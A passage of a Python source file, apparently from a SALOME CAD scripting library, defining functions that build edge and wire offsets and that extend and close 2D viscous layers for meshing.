    # Make this function recursive
    if isinstance(edge, list):
        return_list = []
        for sub_object in edge:
            return_list.append(MakeEdgeOffset(dist, sub_object, pos, face, plane, np, curv, close, rebuild, tol, rev, single, add, infa, dim))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [edge, face, plane] or None in [edge]: return
    #-
    # Check the input shape types
    if geompy.NumberOfEdges(edge) != 1:
        print "[X] The second argument (edge) should be a single edge."; return
    if face != None and geompy.NumberOfFaces(face) != 1:
        print "[X] The fourth argument (face) should be a single face."; return
    if plane != None and geompy.NumberOfFaces(plane) != 1:
        print "[X] The fifth argument (plane) should be a single face."; return
    #-
    # Set father object
    father = None
    if infa == True: father = edge
    #-
    if False: pass
    else:# All checks done
        # Get the sub-shapes
        edge = GetSubShapes(edge)
        #-
        if face == None:# If no face is given by the user...
            if plane == None:# And if no plane is given by the user...
                # Check if the edge is closed
                boundary_vertexes = GetBoundaryVertexes(edge[-1], add = False, single = False)
                edge_is_closed = False
                if boundary_vertexes == None:
                    edge_is_closed = True
                #-
                if edge_is_closed == True:# If it is closed...
                    # Get the edge plane
                    plane = geompy.MakeFace(edge[-1], True)
                    #-
                else:
                    # Close the input edge
                    closing_edge = geompy.MakeEdge(edge[0][0], edge[0][1])
                    closed_contour = geompy.MakeWire([edge[-1], closing_edge])
                    #-
                    if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(edge[-1])[0]) < tol:# If the input wire is straight...
                        # Use the OXY plane
                        plane = geompy.MakeFaceHW(10, 10, 1)
                        #-
                    else:
                        # Get the edge plane
                        plane = geompy.MakeFace(closed_contour, True)
                    #-
            # Get the plane normal
            normal = geompy.GetNormal(plane)
            #-
            # Extrude the edge perpendicular to its plane (to get its normal further)
            face = geompy.MakePrismVecH(edge[-1], normal, 0.1)
            #-
        offset_vertexes = []
        # Get the list of positions on the edge where to compute the offset
        if curv == True:
            parameter_list = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
        else:
            parameter_list = [n / float(np) for n in range(np + 1)]
        #-
        # Create the offset vertexes: one per parameter, translated along the
        # local normal of the extruded face
        for parameter in parameter_list:
            vertex = geompy.MakeVertexOnCurve(edge[-1], parameter)
            normal = geompy.GetNormal(face, vertex)
            if dist == None:
                # No distance given > use 1% of the edge length
                edge_length = geompy.BasicProperties(edge[-1])[0]
                dist = edge_length / 100
                print "[i] No offset distance given > default one:", dist
            if isinstance(dist, list):
                #### Here the numpy function interp() was replaced by code doing the same thing.
                #offsetDistance = numpy.interp(parameter, pos, dist)
                # NOTE(review): if parameter < pos[0], offset_distance is left
                # unset here (NameError); fine with the default pos = [0, 1],
                # but custom pos lists should cover the whole [0, 1] range.
                for i in range(len(pos) - 1):
                    if parameter >= pos[i] and parameter < pos[i + 1]:
                        slope = (dist[i + 1] - dist[i]) / (pos[i + 1] - pos[i])
                        offset_distance = dist[i] + (parameter - pos[i]) * slope
                if parameter == pos[-1]:
                    offset_distance = dist[-1]
                #### -
            else:
                offset_distance = dist
            if rev == True:
                offset_distance *= -1.0
            offset_vertex = geompy.MakeTranslationVectorDistance(vertex, normal, offset_distance)
            offset_vertexes.append(offset_vertex)
        #-
        if dim == 0:# If the output dimension is 0...
            to_return = offset_vertexes
            to_return_name = "EdgeOffset (Vertex)"
            if single == True:
                compound = geompy.MakeCompound(offset_vertexes)
                to_return = compound
                to_return_name = "EdgeOffset (Vertexes)"
        else:
            # Create the offset spline
            offset_spline = geompy.MakeInterpol(offset_vertexes)
            #-
            to_return = offset_spline
            to_return_name = "EdgeOffset"
            if dim == 1 and close == True:
                # Create the intermediate edges
                offset_vertexes = geompy.SubShapeAll(offset_spline, geompy.ShapeType["VERTEX"])
                offset_edges = [offset_spline]
                intermediate_edge = geompy.MakeEdge(geompy.MakeVertexOnCurve(edge[-1], 0), offset_vertexes[0])
                offset_edges.append(intermediate_edge)
                intermediate_edge = geompy.MakeEdge(geompy.MakeVertexOnCurve(edge[-1], 1), offset_vertexes[1])
                offset_edges.append(intermediate_edge)
                #-
                to_return = offset_edges
                to_return_name = "ClosedEdgeOffset (Edge)"
                if single == True:
                    compound = geompy.MakeCompound(offset_edges)
                    to_return = compound
                    to_return_name = "ClosedEdgeOffset"
            if dim == 2:
                # Rebuild edges if necessary
                if rebuild == True:
                    parameter_list = DiscretizeEdgeByCurvature(edge[-1], np, dim = -1)
                    edge[-1] = RebuildSpline(parameter_list, edge[-1], add = False)
                    offset_spline = RebuildSpline(parameter_list, offset_spline, add = False)
                #-
                # Link the edge to the offset
                ##########################################
                linking_face = geompy.MakeQuad2Edges(edge[-1], offset_spline) # This shown better meshing quality
                #tmp_compound = geompy.MakeCompound([edge, offset])
                #linking_face = geompy.MakeFilling(tmp_compound, theMethod = GEOM.FOM_AutoCorrect)
                ##########################################
                #-
                to_return = linking_face
                to_return_name = "EdgeOffset (Face)"
    # Add and return the resulting shape(s)
    if add == True:
        slow_add = False
        if not isinstance(to_return, list) or single == True: slow_add = True
        AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
        if slow_add == False:
            if salome.sg.hasDesktop():
                salome.sg.updateObjBrowser(1)
    return to_return
    #-
# Short alias for MakeEdgeOffset.
meo = MakeEdgeOffset
def MakePlanarWireOffset( dist, wire = None, plane = None, np = 50, curv = True, simple = False, angle = 15, rebuild = True, tol = 1e-7, rev = False, single = True, add = True, infa = False, dim = 1 ):
    """
    Description:
        Creates an offset of a planar wire.
    Arguments:
        # dist
            Description: The offset distance.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
        # wire
            Description: The input wire.
            Type: Wire
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # plane
            Description: See here. If the input wire is straight, the default plane is the OXY plane.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # np
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 50
        # curv
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # simple
            Description: If equals True, the per-edge offsets are returned as they are; the trimming, extension and arc-linking of the offsets at wire corners is skipped.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # angle
            Description: The angle in degrees above which an arc is added between two offset edges.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 15
        # rebuild
            Description: In case dim = 2, defines if the input edge has to be rebuilt in the same way than the offset edge.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # single
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
    Returned Values:
        "dim" value: 1
        "single" value: False
            Type: Edge
            Number: n
            Name: "WireOffset (Edge)"
        "dim" value: 1
        "single" value: True
            Type: Wire or Compound of Edges
            Number: 1
            Name: "WireOffset"
        "dim" value: 2
        "single" value: False
            Type: Face
            Number: n
            Name: "WireOffset (Face)"
        "dim" value: 2
        "single" value: True
            Type: Shell or Compound of Faces
            Number: 1
            Name: "WireOffset (Faces)"
    Conditions of use:
        -
    """
    if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
    input_shape = wire
    # Get the input shape(s)
    input_shape = GetGUISelection(input_shape)
    [input_shape, plane] = GetObject([input_shape, plane])
    #-
    # Make this function recursive
    if isinstance(input_shape, list):
        return_list = []
        for sub_object in input_shape:
            return_list.append(MakePlanarWireOffset(dist, sub_object, plane, np, curv, simple, angle, rebuild, tol, rev, single, add, infa, dim))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [input_shape, plane] or None in [input_shape]: return
    #-
    # Set father object
    father = None
    if infa == True:
        father = input_shape
    #-
    wire = input_shape
    if False: pass
    else:# All checks done
        if rev == True: dist *= -1.0
        small_value = 1e-3
        # Check if the group is "wire-shaped"
        wire_edge_list = GetSubShapes(wire)[1]
        try:
            wire = geompy.MakeWire(wire_edge_list)
        except:
            print "[X] The input shape should be \"wire-shaped\"."; return
        #-
        # Check if the wire is closed
        boundary_vertexes = GetBoundaryVertexes(wire, add = False, single = False)
        wire_is_closed = False
        if boundary_vertexes == None:
            wire_is_closed = True
        #-
        # Reorder wire edges
        edges = GetReorderedEdges(wire, add = False)
        nb_edges = len(edges)
        #-
        # Get the input wire length
        wire_length = geompy.BasicProperties(wire)[0]
        #-
        if plane == None:# If no plane is given by the user...
            # Close the input edge
            wire_is_straigth = False
            if not wire_is_closed:
                closing_edge = geompy.MakeEdge(boundary_vertexes[0], boundary_vertexes[1])
                closing_edge_length = geompy.BasicProperties(closing_edge)[0]
                closed_contour = geompy.MakeWire([wire, closing_edge])
                # Check if the wire is straight
                if abs(closing_edge_length - wire_length) < tol:
                    wire_is_straigth = True
            else:
                closed_contour = wire
            #-
            if wire_is_straigth:
                # Use the OXY plane
                plane = geompy.MakeFaceHW(10, 10, 1)
                #-
            else:
                # Get the wire plane
                plane = geompy.MakeFace(closed_contour, True)
                if geompy.NumberOfFaces(plane) > 1:
                    plane = geompy.SubShapeAll(plane, geompy.ShapeType["FACE"])[0]
            #-
        # Get the plane normal
        normal = geompy.GetNormal(plane)
        #-
        # Check if the wire is planar
        some_vertex_from_wire = GetSubShapes(wire)[0][0]
        plane = geompy.MakePlane(some_vertex_from_wire, normal, wire_length * 1e3)
        common = geompy.MakeCommon(wire, plane)
        if GeometricalEquality([wire, common], tol = 1) == False:
            print "[X] The input wire should be planar."; return
        #-
        # Create offsets (one per edge; for a closed wire the first edge is
        # duplicated at the end so every corner is processed)
        nb_loops = nb_edges
        if wire_is_closed:
            nb_loops += 1
            edges.append(edges[0])
        offsets = []
        contact_vertexes = []
        edge_turn_angles = []
        for i in range(nb_loops):
            edge = edges[i]
            offset = None
            try:
                offset = MakeEdgeOffset(dist, edge, np = np, plane = plane, curv = curv, add = False)
            except:
                dist = -dist
                offset = MakeEdgeOffset(dist, edge, np = np, plane = plane, curv = curv, add = False)
            if i > 0:
                # Get the previous edge and offset
                previous_edge = edges[i - 1]
                previous_offset = offsets[i - 1]
                current_edges = [previous_edge, edge]
                current_offsets = [previous_offset, offset]
                #-
                # Get contact vertex
                contact_vertex = geompy.MakeVertexOnLinesIntersection(previous_edge, edge)
                contact_vertexes.append(contact_vertex)
                #-
                # Get edge orientations (whether each edge starts or ends at
                # the contact vertex)
                edge_orientations = []
                for j in range(2):
                    each_edge = current_edges[j]
                    vertex = geompy.MakeVertexOnCurve(each_edge, 0)
                    distance_from_contact = geompy.MinDistance(vertex, contact_vertex)
                    if distance_from_contact <= tol:
                        edge_orientations.append("out")
                    else:
                        edge_orientations.append("in")
                #-
                # Get edge directions close to contact vertex
                edge_directions = []
                for j in range(2):
                    each_edge = current_edges[j]
                    if edge_orientations[j] == "in":
                        parameter_1 = 1.0
                        parameter_2 = 1.0 - small_value
                    else:
                        parameter_1 = 0.0
                        parameter_2 = 0.0 + small_value
                    v1 = geompy.MakeVertexOnCurve(each_edge, parameter_1)
                    v2 = geompy.MakeVertexOnCurve(each_edge, parameter_2)
                    edge_direction = geompy.MakeVector(v1, v2)
                    edge_direction = GetNormalizedVector(edge_direction, add = False)
                    edge_directions.append(edge_direction)
                #-
                # Get the turn angle difference between edges
                edge_turn_angle = GetTurnAngle(edge_directions[0], edge_directions[1], normal, unit = "deg")
                edge_turn_angles.append(edge_turn_angle)
                #-
                # Get the offset edge directions
                offset_directions = []
                for j in range(2):
                    each_edge = current_edges[j]
                    each_offset = current_offsets[j]
                    if edge_orientations[j] == "in":
                        parameter = 1.0
                    else:
                        parameter = 0.0
                    v1 = geompy.MakeVertexOnCurve(each_edge, parameter)
                    v2 = geompy.MakeVertexOnCurve(each_offset, parameter)
                    offset_direction = geompy.MakeVector(v1, v2)
                    offset_direction = GetNormalizedVector(offset_direction, add = False)
                    offset_directions.append(offset_direction)
                #-
                # Get the turn angle difference between edges
                offset_turn_angle = GetTurnAngle(offset_directions[0], offset_directions[1], normal, unit = "deg")
                #-
                # Reverse the offset if necessary
                turn_angle_difference = abs(offset_turn_angle - edge_turn_angle)
                if abs(180.0 - turn_angle_difference) > 10.0:
                    offset = MakeEdgeOffset( -dist, edge, np = np, plane = plane, curv = curv, add = False)
                #-
            offsets.append(offset)
        #-
        tri_edge_faces = []
        linking_arcs = []
        if simple == False:
            # Link offsets: trim intersecting neighbours, extend nearly
            # aligned ones, or join them with an arc at sharp corners
            for i in range(nb_loops):
                if i > 0:
                    offset = offsets[i]
                    previous_offset = offsets[i - 1]
                    current_offsets = [previous_offset, offset]
                    contact_vertex = contact_vertexes[i - 1]
                    edge_turn_angle = edge_turn_angles[i - 1]
                    # Detect intersection
                    offsets_are_intersected = False
                    intersection = geompy.MakeSection(previous_offset, offset)
                    if geompy.NumberOfSubShapes(intersection, geompy.ShapeType["VERTEX"]) == 1:
                        offsets_are_intersected = True
                    #-
                    if offsets_are_intersected:
                        # Trim the offsets
                        for j in range(2):
                            # NOTE(review): current_edges here still holds the
                            # LAST pair from the offset-creation loop above and
                            # each_edge is not used below - looks like a stale
                            # leftover; confirm before touching.
                            each_edge = current_edges[j]
                            each_offset = current_offsets[j]
                            # Partition the offset
                            partitioned_offset = geompy.MakePartition([each_offset], [intersection])
                            #-
                            # Keep the suitable edge
                            partitioned_offset_edges = geompy.SubShapeAll(partitioned_offset, geompy.ShapeType["EDGE"])
                            max_distance = 0
                            for partitioned_offset_edge in partitioned_offset_edges:
                                distance = geompy.MinDistance(contact_vertex, partitioned_offset_edge)
                                if distance > max_distance:
                                    new_offset = partitioned_offset_edge
                                    max_distance = distance
                            #-
                            # Update the offset list
                            offsets[i - 1 + j] = new_offset
                            #-
                        #-
                    else:
                        if abs(180.0 - edge_turn_angle) <= angle:# For small angles...
                            # Extend the offsets
                            extended_offsets = ExtendSplinesToIntersection(current_offsets, np, tol, add = False)
                            #-
                            # Update the offset list
                            for j in range(2):
                                offsets[i - 1 + j] = extended_offsets[j]
                            #-
                        else:# For big angles...
                            # Get the offset boundary end
                            boundary_vertexes = []
                            for j in range(2):
                                each_offset = current_offsets[j]
                                boundary_vertex = geompy.GetShapesNearPoint(each_offset, contact_vertex, geompy.ShapeType["VERTEX"])
                                boundary_vertex = geompy.SubShapeAll(boundary_vertex, geompy.ShapeType["VERTEX"])[0]
                                boundary_vertexes.append(boundary_vertex)
                            #-
                            # Create the circle arc linking offsets
                            linking_arc = geompy.MakeArcCenter(contact_vertex, boundary_vertexes[0], boundary_vertexes[1])
                            linking_arcs.append(linking_arc)
                            #-
                            # Create the tri - angle face
                            edge_1 = geompy.MakeEdge(contact_vertex, boundary_vertexes[0])
                            edge_2 = geompy.MakeEdge(contact_vertex, boundary_vertexes[1])
                            tri_angle_face = geompy.MakeFaceWires([edge_1, edge_2, linking_arc], isPlanarWanted = True)
                            tri_edge_faces.append(tri_angle_face)
                    #-
                    if i == 1 and wire_is_closed:
                        offsets[-1] = offsets[0]
        #-
        # For a closed wire, drop the duplicated first edge/offset
        if wire_is_closed:
            edges[0] = edges[-1]
            offsets[0] = offsets[-1]
            del edges[-1]
            del offsets[-1]
        if dim == 1:
            to_return = offsets + linking_arcs
            to_return_name = "WireOffset (Edge)"
            if single == True:
                try:
                    offset_wire = geompy.MakeWire(offsets + linking_arcs)
                except:
                    # Fall back to a compound when the edges do not connect
                    offset_wire = geompy.MakeCompound(offsets + linking_arcs)
                to_return = offset_wire
                to_return_name = "WireOffset"
        else:
            # Rebuild edges if necessary
            if rebuild == True:
                for i in range(nb_edges):
                    edge = edges[i]
                    offset = offsets[i]
                    parameter_list = DiscretizeEdgeByCurvature(edge, np, dim = -1)
                    edge = RebuildSpline(parameter_list, edge, add = False)
                    offset = RebuildSpline(parameter_list, offset, add = False)
                    edges[i] = edge
                    offsets[i] = offset
            #-
            # Link edges to offsets
            linking_faces = []
            for i in range(nb_edges):
                edge = edges[i]
                offset = offsets[i]
                ##########################################
                linking_face = geompy.MakeQuad2Edges(edge, offset) # This shown better meshing quality
                #tmp_compound = geompy.MakeCompound([edge, offset])
                #linking_face = geompy.MakeFilling(tmp_compound, theMethod = GEOM.FOM_AutoCorrect)
                ##########################################
                linking_faces.append(linking_face)
            #-
            to_return = linking_faces + tri_edge_faces
            to_return_name = "WireOffset (Face)"
            if single == True:
                try:
                    shell = geompy.MakeShell(linking_faces + tri_edge_faces)
                except:
                    # Fall back to a compound when the faces do not sew
                    shell = geompy.MakeCompound(linking_faces + tri_edge_faces)
                to_return = shell
                to_return_name = "WireOffset (Faces)"
    # Add and return the resulting shape(s)
    if add == True:
        slow_add = False
        if not isinstance(to_return, list) or single == True: slow_add = True
        AddToStudy(to_return, to_return_name, father, suffix = slow_add, refresh = slow_add)
        if slow_add == False:
            if salome.sg.hasDesktop():
                salome.sg.updateObjBrowser(1)
    return to_return
    #-
# Short alias for MakePlanarWireOffset.
mpwo = MakePlanarWireOffset
def ExtendViscousLayer( dist, wire = None, face = None, plane = None, scale = 1, ratio = 1, style = "smooth", coef = 0.5, tol = 1e-7, rev = False, add = True, infa = False, dim = 1 ):
    """
    Description:
        Extends a 2D trailing edge viscous layer.
    Arguments:
        # dist
            Description: The length of the extension.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: -
        # wire
            Description: The input wire.
            Type: Wire
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # face
            Description: See here.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # plane
            Description: See here. If the input edge is straight, the default plane is the OXY plane.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # scale
            Description: The scale coefficient applied on the source middle edge before being "projected" on the end wire.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
        # ratio
            Description: The ratio between the ending wire and the input wire lengthes.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
        # style
            Description: See here.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "smooth"
        # coef
            Description: A coefficient influencing the curvature of the extension edges (0 < coef < 1). The greater it is, the greater is the curvature.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 0.5
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
    Returned Values:
        "dim" value: 1
        "single" value: -
        Type: Compound of Edges
        Number: 1
        Name: "ViscousLayerExtension"
        "dim" value: 2
        "single" value: -
        Type: Shell or Compound of Faces
        Number: 1
        Name: "ViscousLayerExtension (Faces)"
    Conditions of use:
        The input wire has to contain two or three connected edges.
        In addition, if the input wire is straight, it is also necessary to set the face or the plane argument so as to give the function the extension direction
    """
    if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    wire = GetGUISelection(wire)
    [wire, face, plane] = GetObject([wire, face, plane])
    #-
    # Make this function recursive
    if isinstance(wire, list):
        return_list = []
        for sub_object in wire:
            return_list.append(ExtendViscousLayer(dist, sub_object, face, plane, scale, ratio, style, coef, tol, rev, add, infa, dim))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [wire, face, plane] or None in [wire]: return
    #-
    # Set father object
    father = None
    if infa == True: father = wire
    #-
    if False: pass
    else:# All checks done
        dist = float(dist)
        wire_edges = GetSubShapes(wire)[1]
        try:
            wire = geompy.MakeWire(wire_edges)
        except:
            print "[X] The input shape should be \"wire-shaped\"."; return
        # Get the sub-shapes
        wire = GetSubShapes(wire)
        #-
        # Sort vertexes
        # A vertex touching two wire edges is a junction ("inside") vertex;
        # a vertex touching only one edge is a wire extremity.
        extremum_vertexes = []
        inside_vertexes = []
        for wire_vertex in wire[0]:
            nb_contacts = 0
            for wire_edge in wire[1]:
                min_distance = geompy.MinDistance(wire_edge, wire_vertex)
                if min_distance == 0:
                    nb_contacts += 1
            if nb_contacts == 2:
                inside_vertexes.append(wire_vertex)
            else:
                extremum_vertexes.append(wire_vertex)
        #-
        # Get number of edges in the wire
        edge_number = len(wire[1])
        #-
        # Get the wire length
        wire_length = geompy.BasicProperties(wire[-1])[0]
        #-
        if edge_number == 3: # If the foil trailing edge is thicker than zero...
            # Get middle edge size
            middle_edge_length = geompy.MinDistance(inside_vertexes[0], inside_vertexes[1])
            #-
            # Get virtual wire size
            # (replace the real middle edge length by its scaled value in the total)
            wire_length -= middle_edge_length
            middle_edge_length *= scale
            wire_length += middle_edge_length
            #-
        # Create the closing edge
        closing_edge = geompy.MakeEdge(extremum_vertexes[0], extremum_vertexes[1])
        #-
        # Get the extension direction
        if face == None:# If no face is given by the user...
            # Close the wire
            closed_contour = geompy.MakeWire([wire[-1], closing_edge])
            #-
            if plane == None:# And if no plane is given by the user...
                if abs(geompy.BasicProperties(closing_edge)[0] - geompy.BasicProperties(wire[-1])[0]) < tol:# If the input wire is straight...
                    # Use the OXY plane
                    plane = geompy.MakeFaceHW(10, 10, 1)
                    #-
                else:
                    # Get the wire plane
                    plane = geompy.MakeFace(closed_contour, True)
                    #-
            # Get the plane normal
            normal = geompy.GetNormal(plane)
            #-
            # Extrude the closing edge
            face = geompy.MakePrismVecH(closing_edge, normal, 0.1)
            #-
        extension_direction = geompy.GetNormal(face)
        #-
        # Create the end edge
        # NOTE(review): this branch looks unreachable — dist already went through
        # float() above, which raises on None; confirm whether dist = None is a
        # supported calling convention.
        if dist == None:
            wire_length = geompy.BasicProperties(wire[-1])[0]
            dist = wire_length * 3
            print "[i] No offset distance given > default one:", dist
        if rev == True:
            dist *= -1.0
        end_edge = geompy.MakeTranslationVectorDistance(closing_edge, extension_direction, dist)
        #-
        if ratio != 1:
            # Get the end edge middle vertex
            end_edge_middle_vertex = geompy.MakeVertexOnCurve(end_edge, 0.5)
            #-
            # Scale the end edge (rebuilt symmetrically around its middle vertex)
            end_edge_length = geompy.BasicProperties(end_edge)[0]
            end_edge_length *= ratio
            scaled_end_edge_first_vertex = geompy.MakeTranslationVectorDistance(end_edge_middle_vertex, end_edge, -end_edge_length / 2)
            scaled_end_edge_last_vertex = geompy.MakeTranslationVectorDistance(end_edge_middle_vertex, end_edge, end_edge_length / 2)
            end_edge = geompy.MakeEdge(scaled_end_edge_first_vertex, scaled_end_edge_last_vertex)
            #-
        # Create the inside extension edges
        inside_extension_edges = []
        inside_end_edge_vertexes = []
        for i in range(edge_number - 1):
            extremum_edge_length = geompy.MinDistance(inside_vertexes[i], extremum_vertexes[i])
            end_ratio = extremum_edge_length / wire_length
            # The second junction vertex is located from the opposite end of the
            # end edge, hence the mirrored curve parameter.
            if i == 1:
                end_ratio = 1.0 - end_ratio
            inside_end_edge_vertex = geompy.MakeVertexOnCurve(end_edge, end_ratio)
            inside_end_edge_vertexes.append(inside_end_edge_vertex)
            inside_extension_edge = geompy.MakeEdge(inside_vertexes[i], inside_end_edge_vertex)
            if style == "smooth":
                # Bow the extension edge: push its midpoint further along the
                # extension direction and interpolate a spline through it.
                inside_extension_edge_middle_vertex = geompy.MakeVertexOnCurve(inside_extension_edge, 0.5)
                translated_inside_extension_edge_middle_vertex = geompy.MakeTranslationVectorDistance(inside_extension_edge_middle_vertex, extension_direction, dist / 2 * coef)
                inside_extension_edge = geompy.MakeInterpol([inside_vertexes[i], translated_inside_extension_edge_middle_vertex, inside_end_edge_vertex])
            inside_extension_edges.append(inside_extension_edge)
        #-
        # Create extremum extension edges
        extremum_extension_edges = []
        end_edge_vertexes = geompy.SubShapeAll(end_edge, geompy.ShapeType["VERTEX"])
        for i in range(2):
            extremum_extension_edge = geompy.MakeEdge(end_edge_vertexes[i], extremum_vertexes[i])
            if style == "smooth":
                # Same bowing as above, applied to the outer extension edges.
                extremum_extension_edge_middle_vertex = geompy.MakeVertexOnCurve(extremum_extension_edge, 0.5)
                TranslatedExtremumExtensionEdgeMiddleVertex = geompy.MakeTranslationVectorDistance(extremum_extension_edge_middle_vertex, extension_direction, dist / 2 * coef)
                #extremum_extension_edge = geompy.MakeInterpol([end_edge_vertexes[i], TranslatedExtremumExtensionEdgeMiddleVertex, extremum_vertexes[i]])
                extremum_extension_edge = geompy.MakeInterpol([extremum_vertexes[i], TranslatedExtremumExtensionEdgeMiddleVertex, end_edge_vertexes[i]])
            extremum_extension_edges.append(extremum_extension_edge)
        #-
        extension_edges = inside_extension_edges + extremum_extension_edges
        # Partition end edge (split it at the junction vertexes)
        end_edge_partition = geompy.MakePartition([end_edge], inside_end_edge_vertexes)
        end_edges = geompy.SubShapeAll(end_edge_partition, geompy.ShapeType["EDGE"])
        #-
        if dim == 1:
            extension_edges = geompy.MakeCompound(extension_edges + end_edges)
            to_return = extension_edges
            to_return_name = "ViscousLayerExtension"
        else:
            # Build quadrangle faces between neighbouring extension edges.
            inside_extension_edge_compound = geompy.MakeCompound(inside_extension_edges)
            faces = []
            for extremum_extension_edge in extremum_extension_edges:
                some_vertex = geompy.MakeVertexOnCurve(extremum_extension_edge, 0)
                inside_extension_edge = geompy.GetShapesNearPoint(inside_extension_edge_compound, some_vertex, geompy.ShapeType["EDGE"])
                face = geompy.MakeQuad2Edges(inside_extension_edge, extremum_extension_edge)
                faces.append(face)
            if len(inside_extension_edges) == 2:
                face = geompy.MakeQuad2Edges(inside_extension_edges[0], inside_extension_edges[1])
                faces.append(face)
            # Create the output shell
            shell = geompy.MakeShell(faces)
            #-
            to_return = shell
            to_return_name = "ViscousLayerExtension (Faces)"
        # Add and return the resulting shape(s)
        if add == True:
            AddToStudy(to_return, to_return_name, father)
        return to_return
#-
# Short alias for ExtendViscousLayer (interactive console convenience).
evl = ExtendViscousLayer
def CloseViscousLayer( wire = None, dist = "auto", face = None, plane = None, style = "smooth", tol = 1e-7, rev = False, add = True, infa = False, dim = 1 ):
    """
    Description:
        Closes a 2D viscous layer.
    Arguments:
        # wire
            Description: The input wire.
            Type: Wire
            GUI selection: yes
            Selection by name: yes
            Recursive: yes
            Default value: None
        # dist
            Description: The length of the closure. If equals "auto", the length is automatically calculated by the function.
            Type: Float or String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "auto"
        # face
            Description: See here.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # plane
            Description: See here. If the input edge is straight, the default plane is the OXY plane.
            Type: Face
            GUI selection: -
            Selection by name: yes
            Recursive: -
            Default value: None
        # style
            Description: See here.
            Type: String
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: "smooth"
        # tol
            Description: See here.
            Type: Float
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1e-7
        # rev
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # add
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: True
        # infa
            Description: See here.
            Type: Boolean
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: False
        # dim
            Description: See here.
            Type: Integer
            GUI selection: -
            Selection by name: -
            Recursive: -
            Default value: 1
    Returned Values:
        "dim" value: 1
        "single" value: -
        Type: Compound of Edges
        Number: 1
        Name: "ViscousLayerClosing"
        "dim" value: 2
        "single" value: -
        Type: Shell or Compound of Faces
        Number: 1
        Name: "ViscousLayerClosing (Faces)"
    Conditions of use:
        The input wire has to contain two or three connected edges.
        In this case, the smooth style can only be used if the wire is straight. Finally, if the input wire is straight, it is also necessary to set the face or the plane argument so as the function knows the closing direction.
    """
    if dim not in [1, 2]: print "[X] There is no shape to return corresponding to the given dimension."; return
    # Get the input shape(s)
    wire = GetGUISelection(wire)
    [wire, face, plane] = GetObject([wire, face, plane])
    #-
    # Make this function recursive
    if isinstance(wire, list):
        return_list = []
        for sub_object in wire:
            return_list.append(CloseViscousLayer(sub_object, dist, face, plane, style, tol, rev, add, infa, dim))
        return return_list
    #-
    # Check the input shape existence
    if "error" in [wire, face, plane] or None in [wire]: return
    #-
    # Set father object
    father = None
    if infa == True: father = wire
    #-
    if False: pass
    else:# All checks done
        if not isinstance(dist, str):
            dist = float(dist)
        wire_edges = GetSubShapes(wire)[1]
        try:
            wire = geompy.MakeWire(wire_edges)
        except:
            print "[X] The input shape should be \"wire-shaped\"."; return
        # Get the sub-shapes
        wire = GetSubShapes(wire)
        #-
        # Sort the wire vertexes
        # A vertex touching two wire edges is a junction ("inside") vertex;
        # a vertex touching only one edge is a wire extremity.
        wire_vertexes = geompy.SubShapeAll(wire[-1], geompy.ShapeType["VERTEX"])
        inside_vertexes = []
        outside_vertexes = []
        for wire_vertex in wire_vertexes:
            nb_contacts = 0
            for edge in wire[1]:
                min_distance = geompy.MinDistance(edge, wire_vertex)
                if min_distance == 0:
                    nb_contacts += 1
            if nb_contacts == 2:
                inside_vertexes.append(wire_vertex)
            else:
